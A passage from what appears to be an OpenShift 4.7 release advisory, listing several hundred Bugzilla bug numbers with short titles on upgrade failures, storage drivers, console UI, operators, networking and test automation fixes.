(errors)\n1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController\n1911574 - Expose volume mode  on Upload Data form\n1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined\n1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel\n1911656 - using \u0027operator-sdk run bundle\u0027 to install operator successfully, but the command output said \u0027Failed to run bundle\u0027\u0027\n1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state\n1911782 - Descheduler should not evict pod used local storage by the PVC\n1911796 - uploading flow being displayed before submitting the form\n1912066 - The ansible type operator\u0027s manager container is not stable when managing the CR\n1912077 - helm operator\u0027s default rbac forbidden\n1912115 - [automation] Analyze job keep failing because of \u0027JavaScript heap out of memory\u0027\n1912237 - Rebase CSI sidecars for 4.7\n1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page\n1912409 - Fix flow schema deployment\n1912434 - Update guided tour modal title\n1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken\n1912523 - Standalone pod status not updating in topology graph\n1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion\n1912558 - TaskRun list and detail screen doesn\u0027t show Pending status\n1912563 - p\u0026f: carry 97206: clean up executing request on panic\n1912565 - OLM macOS local build broken by moby/term dependency\n1912567 - [OCP on RHV] Node becomes to \u0027NotReady\u0027 status when shutdown vm from RHV UI only on the second deletion\n1912577 - 4.1/4.2-\u003e4.3-\u003e...-\u003e 4.7 upgrade is stuck during 4.6-\u003e4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff\n1912590 - publicImageRepository not being populated\n1912640 - Go operator\u0027s controller pods is forbidden\n1912701 - Handle dual-stack configuration for NIC IP\n1912703 - multiple queries can\u0027t be plotted in the same graph under some conditons\n1912730 - Operator backed: In-context should support visual connector if SBO is not installed\n1912828 - Align High Performance VMs with High Performance in RHV-UI\n1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates\n1912852 - VM from wizard - available VM templates - \"storage\" field is \"0 B\"\n1912888 - recycler template should be moved to KCM operator\n1912907 - Helm chart repository index can contain unresolvable relative URL\u0027s\n1912916 - Set external traffic policy to cluster for IBM platform\n1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller\n1912938 - Update confirmation modal for quick starts\n1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment\n1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment\n1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver\n1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912977 - rebase upstream static-provisioner\n1913006 - Remove etcd v2 specific alerts with etcd_http* metrics\n1913011 - [OVN] Pod\u0027s external traffic not use egressrouter macvlan ip as a source ip\n1913037 - update static-provisioner base image\n1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state\n1913085 - Regression OLM uses scoped client for CRD installation\n1913096 - backport: cadvisor machine metrics are missing in k8s 1.19\n1913132 - The installation of Openshift Virtualization reports success early before it \u0027s succeeded eventually\n1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root\n1913196 - Guided Tour doesn\u0027t handle resizing of browser\n1913209 - Support modal should be shown for community supported templates\n1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort\n1913249 - update info alert this template is not aditable\n1913285 - VM list empty state should link to virtualization quick starts\n1913289 - Rebase AWS EBS CSI driver for 4.7\n1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled\n1913297 - Remove restriction of taints for arbiter node\n1913306 - unnecessary scroll bar is present on quick starts panel\n1913325 - 1.20 rebase for openshift-apiserver\n1913331 - Import from git: Fails to detect Java builder\n1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used\n1913343 - (release-4.7) Added changelog file for insights-operator\n1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator\n1913371 - Missing i18n key \"Administrator\" in namespace \"console-app\" and language \"en.\"\n1913386 - users can see metrics of namespaces for which they don\u0027t have rights when monitoring own services with prometheus user workloads\n1913420 - Time duration setting of resources is not being displayed\n1913536 - 4.6.9 -\u003e 4.7 upgrade hangs.  RHEL 7.9 worker stuck on \"error enabling unit: Failed to execute operation: File exists\\\\n\\\"\n1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase\n1913560 - Normal user cannot load template on the new wizard\n1913563 - \"Virtual Machine\" is not on the same line in create button when logged with normal user\n1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table\n1913568 - Normal user cannot create template\n1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker\n1913585 - Topology descriptive text fixes\n1913608 - Table data contains data value None after change time range in graph and change back\n1913651 - Improved Red Hat image and crashlooping OpenShift pod collection\n1913660 - Change location and text of Pipeline edit flow alert\n1913685 - OS field not disabled when creating a VM from a template\n1913716 - Include additional use of existing libraries\n1913725 - Refactor Insights Operator Plugin states\n1913736 - Regression: fails to deploy computes when using root volumes\n1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes\n1913751 - add third-party network plugin test suite to openshift-tests\n1913783 - QE-To fix the merging pr issue, commenting the afterEach() block\n1913807 - Template support badge should not be shown for community supported templates\n1913821 - Need definitive steps about uninstalling descheduler operator\n1913851 - Cluster Tasks are not sorted in pipeline builder\n1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists\n1913951 - Update the Devfile Sample Repo to an Official Repo Host\n1913960 - Cluster Autoscaler should use 1.20 dependencies\n1913969 - Field dependency descriptor can sometimes cause an exception\n1914060 - Disk created from \u0027Import via Registry\u0027 cannot be used as boot disk\n1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy\n1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks)\n1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances\n1914125 - Still using /dev/vde as default device path when create localvolume\n1914183 - Empty NAD page is missing link to quickstarts\n1914196 - target port in `from dockerfile` flow does nothing\n1914204 - Creating VM from dev perspective may fail with template not found error\n1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets\n1914212 - [e2e][automation] Add test to validate bootable disk souce\n1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes\n1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows\n1914287 - Bring back selfLink\n1914301 - User VM Template source should show the same provider as template itself\n1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs\n1914309 - /terminal page when WTO not installed shows nonsensical error\n1914334 - order of getting started samples is arbitrary\n1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel]  timeout on s390x\n1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI\n1914405 - Quick search modal should be opened when coming back from a selection\n1914407 - Its not clear that node-ca is running as non-root\n1914427 - Count of pods on the dashboard is incorrect\n1914439 - Typo in SRIOV port create command example\n1914451 - cluster-storage-operator pod running as root\n1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true\n1914642 - Customize Wizard Storage tab does not pass validation\n1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling\n1914793 - device names should not be translated\n1914894 - Warn about using non-groupified api version\n1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug\n1914932 - Put correct resource name in relatedObjects\n1914938 - PVC disk is not shown on customization wizard general tab\n1914941 - VM Template rootdisk is not deleted after fetching default disk bus\n1914975 - Collect logs from openshift-sdn namespace\n1915003 - No estimate of average node readiness during lifetime of a cluster\n1915027 - fix MCS blocking iptables rules\n1915041 - s3:ListMultipartUploadParts is relied on implicitly\n1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons\n1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours\n1915085 - Pods created and rapidly terminated get stuck\n1915114 - [aws-c2s] worker machines are not create during install\n1915133 - Missing default pinned nav items in dev perspective\n1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource\n1915187 - Remove the \"Tech preview\" tag in web-console for volumesnapshot\n1915188 - Remove HostSubnet anonymization\n1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment\n1915217 - OKD payloads expect to be signed with production keys\n1915220 - Remove dropdown workaround for user settings\n1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure\n1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod\n1915277 - [e2e][automation]fix cdi upload form test\n1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout\n1915304 - Updating scheduling component builder \u0026 base images to be consistent with ART\n1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node\n1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection\n1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod\n1915357 - Dev Catalog doesn\u0027t load anything if virtualization operator is installed\n1915379 - New template wizard should require provider and make support input a dropdown type\n1915408 - Failure in operator-registry kind e2e test\n1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation\n1915460 - Cluster name size might affect installations\n1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance\n1915540 - Silent 4.7 RHCOS install failure on ppc64le\n1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI)\n1915582 - p\u0026f: carry upstream pr 97860\n1915594 - [e2e][automation] Improve test for disk validation\n1915617 - Bump bootimage for various fixes\n1915624 - \"Please fill in the following field: Template provider\" blocks customize wizard\n1915627 - Translate Guided Tour text. \n1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error\n1915647 - Intermittent White screen when the connector dragged to revision\n1915649 - \"Template support\" pop up is not a warning; checkbox text should be rephrased\n1915654 - [e2e][automation] Add a verification for Afinity modal should hint \"Matching node found\"\n1915661 - Can\u0027t run the \u0027oc adm prune\u0027 command in a pod\n1915672 - Kuryr doesn\u0027t work with selfLink disabled. \n1915674 - Golden image PVC creation - storage size should be taken from the template\n1915685 - Message for not supported template is not clear enough\n1915760 - Need to increase timeout to wait rhel worker get ready\n1915793 - quick starts panel syncs incorrectly across browser windows\n1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster\n1915818 - vsphere-problem-detector: use \"_totals\" in metrics\n1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol\n1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version\n1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0\n1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics\n1915885 - Kuryr doesn\u0027t support workers running on multiple subnets\n1915898 - TaskRun log output shows \"undefined\" in streaming\n1915907 - test/cmd/builds.sh uses docker.io\n1915912 - sig-storage-csi-snapshotter image not available\n1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder \u0026 base images to be consistent with ART\n1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard\n1915939 - Resizing the browser window removes Web Terminal Icon\n1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance]\n1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7\n1915962 - ROKS: manifest with machine health check fails to apply in 4.7\n1915972 - Global configuration breadcrumbs do not work as expected\n1915981 - Install ethtool and conntrack in container for debugging\n1915995 - \"Edit RoleBinding Subject\" action under RoleBinding list page kebab actions causes unhandled exception\n1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups\n1916021 - OLM enters infinite loop if Pending CSV replaces itself\n1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry\n1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert\u0027s annotations\n1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk\n1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration\n1916145 - Explicitly set minimum versions of python libraries\n1916164 - Update csi-driver-nfs builder \u0026 base images to be consistent with ART\n1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7\n1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third\n1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2\n1916379 - error metrics from vsphere-problem-detector should be gauge\n1916382 - Can\u0027t create ext4 filesystems with Ignition\n1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving \u0027verified: false\u0027 even for verified updates\n1916401 - Deleting an ingress controller with a bad DNS Record hangs\n1916417 - [Kuryr] Must-gather does not have all Custom Resources information\n1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image\n1916454 - teach CCO about upgradeability from 4.6 to 4.7\n1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation\n1916502 - Boot disk mirroring fails with mdadm error\n1916524 - Two rootdisk shows on storage step\n1916580 - Default yaml is broken for VM and VM template\n1916621 - oc adm node-logs examples are wrong\n1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret. \n1916692 - Possibly fails to destroy LB and thus cluster\n1916711 - Update Kube dependencies in MCO to 1.20.0\n1916747 - remove links to quick starts if virtualization operator isn\u0027t updated to 2.6\n1916764 - editing a workload with no application applied, will auto fill the app\n1916834 - Pipeline Metrics - Text Updates\n1916843 - collect logs from openshift-sdn-controller pod\n1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed\n1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually\n1916888 - OCS wizard Donor chart does not get updated when `Device Type` is edited\n1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error \"Forbidden: cannot specify lbFloatingIP and apiFloatingIP together\"\n1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace\n1917101 - [UPI on oVirt] - \u0027RHCOS image\u0027 topic isn\u0027t located in the right place in UPI document\n1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to \u0027\"ProxyConfigController\" controller failed to sync \"key\"\u0027 error\n1917117 - Common templates - disks screen: invalid disk name\n1917124 - Custom template - clone existing PVC - the name of the target VM\u0027s data volume is hard-coded; only one VM can be created\n1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator\n1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable. \n1917148 - [oVirt] Consume 23-10 ovirt sdk\n1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened\n1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console\n1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory\n1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7\n1917327 - annotations.message maybe wrong for NTOPodsNotReady alert\n1917367 - Refactor periodic.go\n1917371 - Add docs on how to use the built-in profiler\n1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console\n1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui\n1917484 - [BM][IPI] Failed to scale down machineset\n1917522 - Deprecate --filter-by-os in oc adm catalog mirror\n1917537 - controllers continuously busy reconciling operator\n1917551 - use min_over_time for vsphere prometheus alerts\n1917585 - OLM Operator install page missing i18n\n1917587 - Manila CSI operator becomes degraded if user doesn\u0027t have permissions to list share types\n1917605 - Deleting an exgw causes pods to no longer route to other exgws\n1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API\n1917656 - Add to Project/application for eventSources from topology shows 404\n1917658 - Show TP badge for sources powered by camel connectors in create flow\n1917660 - Editing parallelism of job get error info\n1917678 - Could not provision pv when no symlink and target found on rhel worker\n1917679 - Hide double CTA in admin pipelineruns tab\n1917683 - `NodeTextFileCollectorScrapeError` alert in OCP 4.6 cluster. \n1917759 - Console operator panics after setting plugin that does not exists to the console-operator config\n1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0\n1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0\n1917799 - Gather s list of names and versions of installed OLM operators\n1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error\n1917814 - Show Broker create option in eventing under admin perspective\n1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types\n1917872 - [oVirt] rebase on latest SDK 2021-01-12\n1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image\n1917938 - upgrade version of dnsmasq package\n1917942 - Canary controller causes panic in ingress-operator\n1918019 - Undesired scrollbars in markdown area of QuickStart\n1918068 - Flaky olm integration tests\n1918085 - reversed name of job and namespace in cvo log\n1918112 - Flavor is not editable if a customize VM is created from cli\n1918129 - Update IO sample archive with missing resources \u0026 remove IP anonymization from clusteroperator resources\n1918132 - i18n: Volume Snapshot Contents menu is not translated\n1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2\n1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn\u0027t be installed on OSP\n1918153 - When `\u0026` character is set as an environment variable in a build config it is getting converted as `\\u0026`\n1918185 - Capitalization on PLR details page\n1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections\n1918318 - Kamelet connector\u0027s are not shown in eventing section under Admin perspective\n1918351 - Gather SAP configuration (SCC \u0026 ClusterRoleBinding)\n1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews\n1918395 - [ovirt] increase livenessProbe period\n1918415 - MCD nil pointer on dropins\n1918438 - [ja_JP, zh_CN] Serverless i18n misses\n1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig\n1918471 - CustomNoUpgrade Feature gates are not working correctly\n1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk\n1918622 - Updating ose-jenkins-agent-maven builder \u0026 base images to be consistent with ART\n1918623 - Updating ose-jenkins-agent-nodejs-12 builder \u0026 base images to be consistent with ART\n1918625 - Updating ose-jenkins-agent-nodejs-10 builder \u0026 base images to be consistent with ART\n1918635 - Updating openshift-jenkins-2 builder \u0026 base images to be consistent with ART #1197\n1918639 - Event listener with triggerRef crashes the console\n1918648 - Subscription page doesn\u0027t show InstallPlan correctly\n1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack\n1918748 - helmchartrepo is not http(s)_proxy-aware\n1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI\n1918803 - Need dedicated details page w/ global config breadcrumbs for \u0027KnativeServing\u0027 plugin\n1918826 - Insights popover icons are not horizontally aligned\n1918879 - need better debug for bad pull secrets\n1918958 - The default NMstate instance from the operator is incorrect\n1919097 - Close bracket \")\" missing at the end of the sentence in the UI\n1919231 - quick search modal cut off on smaller screens\n1919259 - Make \"Add x\" singular in Pipeline Builder\n1919260 - VM Template list actions should not wrap\n1919271 - NM prepender script doesn\u0027t support systemd-resolved\n1919341 - Updating ose-jenkins-agent-maven builder \u0026 base images to be consistent with ART\n1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry\n1919379 - dotnet logo out of date\n1919387 - Console login fails with no error when it can\u0027t write to localStorage\n1919396 - A11y Violation: svg-img-alt on Pod Status ring\n1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren\u0027t verified\n1919750 - Search InstallPlans got Minified React error\n1919778 - Upgrade is stuck in insights operator Degraded with \"Source clusterconfig could not be retrieved\" until insights operator pod is manually deleted\n1919823 - OCP 4.7 Internationalization Chinese tranlate issue\n1919851 - Visualization does not render when Pipeline \u0026 Task share same name\n1919862 - The tip information for `oc new-project  --skip-config-write` is wrong\n1919876 - VM created via customize wizard cannot inherit template\u0027s PVC attributes\n1919877 - Click on KSVC breaks with white screen\n1919879 - The toolbox container name is changed from \u0027toolbox-root\u0027  to \u0027toolbox-\u0027 in a chroot environment\n1919945 - user entered name value overridden by default value when selecting a git repository\n1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference\n1919970 - NTO does not update when the tuned profile is updated. \n1919999 - Bump Cluster Resource Operator Golang Versions\n1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration\n1920200 - user-settings network error results in infinite loop of requests\n1920205 - operator-registry e2e tests not working properly\n1920214 - Bump golang to 1.15 in cluster-resource-override-admission\n1920248 - re-running the pipelinerun with pipelinespec crashes the UI\n1920320 - VM template field is \"Not available\" if it\u0027s created from common template\n1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode is `Disk Mode`\n1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs\n1920390 - Monitoring \u003e Metrics graph shifts to the left when clicking the \"Stacked\" option and when toggling data series lines on / off\n1920426 - Egress Router CNI OWNERS file should have ovn-k team members\n1920427 - Need to update `oc login` help page since we don\u0027t support prompt interactively for the username\n1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time\n1920438 - openshift-tuned panics on turning debugging on/off. \n1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn\n1920481 - kuryr-cni pods using unreasonable amount of CPU\n1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof\n1920524 - Topology graph crashes adding Open Data Hub operator\n1920526 - catalog operator causing CPU spikes and bad etcd performance\n1920551 - Boot Order is not editable for Templates in \"openshift\" namespace\n1920555 - bump cluster-resource-override-admission api dependencies\n1920571 - fcp multipath will not recover failed paths automatically\n1920619 - Remove default scheduler profile value\n1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present\n1920674 - MissingKey errors in bindings namespace\n1920684 - Text in language preferences modal is misleading\n1920695 - CI is broken because of bad image registry reference in the Makefile\n1920756 - update generic-admission-server library to get the system:masters authorization optimization\n1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for \"network-check-target\" failed when \"defaultNodeSelector\" is set\n1920771 - i18n: Delete persistent volume claim drop down is not translated\n1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI\n1920912 - Unable to power off BMH from console\n1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by \"2\"\n1920984 - [e2e][automation] some menu items names are out dated\n1921013 - Gather PersistentVolume definition (if any) used in image registry config\n1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior)\n1921087 - \u0027start next quick start\u0027 link doesn\u0027t work and is unintuitive\n1921088 - test-cmd is failing on volumes.sh pretty consistently\n1921248 - Clarify the kubelet configuration cr description\n1921253 - Text filter default placeholder text not internationalized\n1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window\n1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo\n1921277 - Fix Warning and Info log statements to handle arguments\n1921281 - oc get -o yaml --export returns \"error: unknown flag: --export\"\n1921458 - [SDK] Gracefully handle the `run bundle-upgrade` if the lower version operator doesn\u0027t exist\n1921556 - [OCS with Vault]: OCS pods didn\u0027t comeup after deploying with Vault details from UI\n1921572 - For external source (i.e GitHub Source) form view as well shows yaml\n1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass\n1921610 - Pipeline metrics font size inconsistency\n1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1921655 - [OSP] Incorrect error handling during cloudinfo generation\n1921713 - [e2e][automation]  fix failing VM migration tests\n1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view\n1921774 - delete application modal errors when a resource cannot be found\n1921806 - Explore page APIResourceLinks aren\u0027t i18ned\n1921823 - CheckBoxControls not internationalized\n1921836 - AccessTableRows don\u0027t internationalize \"User\" or \"Group\"\n1921857 - Test flake when hitting router in e2e tests due to one router not being up to date\n1921880 - Dynamic plugins are not initialized on console load in production mode\n1921911 - Installer PR #4589 is causing leak of IAM role policy bindings\n1921921 - \"Global Configuration\" breadcrumb does not use sentence case\n1921949 - Console bug - source code URL broken for gitlab self-hosted repositories\n1921954 - Subscription-related constraints in ResolutionFailed events are misleading\n1922015 - buttons in modal header are invisible on Safari\n1922021 - Nodes terminal page \u0027Expand\u0027 \u0027Collapse\u0027 button not translated\n1922050 - [e2e][automation] Improve vm clone tests\n1922066 - Cannot create VM from custom template which has extra disk\n1922098 - Namespace selection dialog is not closed after select a namespace\n1922099 - Updated Readme documentation for QE code review and setup\n1922146 - Egress Router CNI doesn\u0027t have logging support. \n1922267 - Collect specific ADFS error\n1922292 - Bump RHCOS boot images for 4.7\n1922454 - CRI-O doesn\u0027t enable pprof by default\n1922473 - reconcile LSO images for 4.8\n1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace\n1922782 - Source registry missing docker:// in yaml\n1922907 - Interop UI Tests - step implementation for updating feature files\n1922911 - Page crash when click the \"Stacked\" checkbox after clicking the data series toggle buttons\n1922991 - \"verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build\" test fails on OKD\n1923003 - WebConsole Insights widget showing \"Issues pending\" when the cluster doesn\u0027t report anything\n1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources\n1923102 - [vsphere-problem-detector-operator] pod\u0027s version is not correct\n1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot\n1923674 - k8s 1.20 vendor dependencies\n1923721 - PipelineRun running status icon is not rotating\n1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios\n1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator\n1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator\n1923874 - Unable to specify values with % in kubeletconfig\n1923888 - Fixes error metadata gathering\n1923892 - Update arch.md after refactor. \n1923894 - \"installed\" operator status in operatorhub page does not reflect the real status of operator\n1923895 - Changelog generation. \n1923911 - [e2e][automation] Improve tests for vm details page and list filter\n1923945 - PVC Name and Namespace resets when user changes os/flavor/workload\n1923951 - EventSources shows `undefined` in project\n1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins\n1924046 - Localhost: Refreshing on a Project removes it from nav item urls\n1924078 - Topology quick search View all results footer should be sticky. \n1924081 - NTO should ship the latest Tuned daemon release 2.15\n1924084 - backend tests incorrectly hard-code artifacts dir\n1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents  do not have unexpected content using a simple Docker Strategy Build\n1924135 - Under sufficient load, CRI-O may segfault\n1924143 - Code Editor Decorator url is broken for Bitbucket repos\n1924188 - Language selector dropdown doesn\u0027t always pre-select the language\n1924365 - Add extra disk for VM which use boot source PXE\n1924383 - Degraded network operator during upgrade to 4.7.z\n1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box. \n1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can\u0027t set finalizers on\n1924583 - Deprectaed templates are listed in the Templates screen\n1924870 - pick upstream pr#96901: plumb context with request deadline\n1924955 - Images from Private external registry not working in deploy Image\n1924961 - k8sutil.TrimDNS1123Label creates invalid values\n1924985 - Build egress-router-cni for both RHEL 7 and 8\n1925020 - Console demo plugin deployment image shoult not point to dockerhub\n1925024 - Remove extra validations on kafka source form view net section\n1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running\n1925072 - NTO needs to ship the current latest stalld v1.7.0\n1925163 - Missing info about dev catalog in boot source template column\n1925200 - Monitoring Alert icon is missing on the workload in Topology view\n1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1\n1925319 - bash syntax error in configure-ovs.sh script\n1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data\n1925516 - Pipeline Metrics Tooltips are overlapping data\n1925562 - Add new ArgoCD link from GitOps application environments page\n1925596 - Gitops details page image and commit id text overflows past card boundary\n1926556 - \u0027excessive etcd leader changes\u0027 test case failing in serial job because prometheus data is wiped by machine set test\n1926588 - The tarball of operator-sdk is not ready for ocp4.7\n1927456 - 4.7 still points to 4.6 catalog images\n1927500 - API server exits non-zero on 2 SIGTERM signals\n1929278 - Monitoring workloads using too high a priorityclass\n1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api\n1929920 - Cluster monitoring documentation link is broken - 404 not found\n\n5. 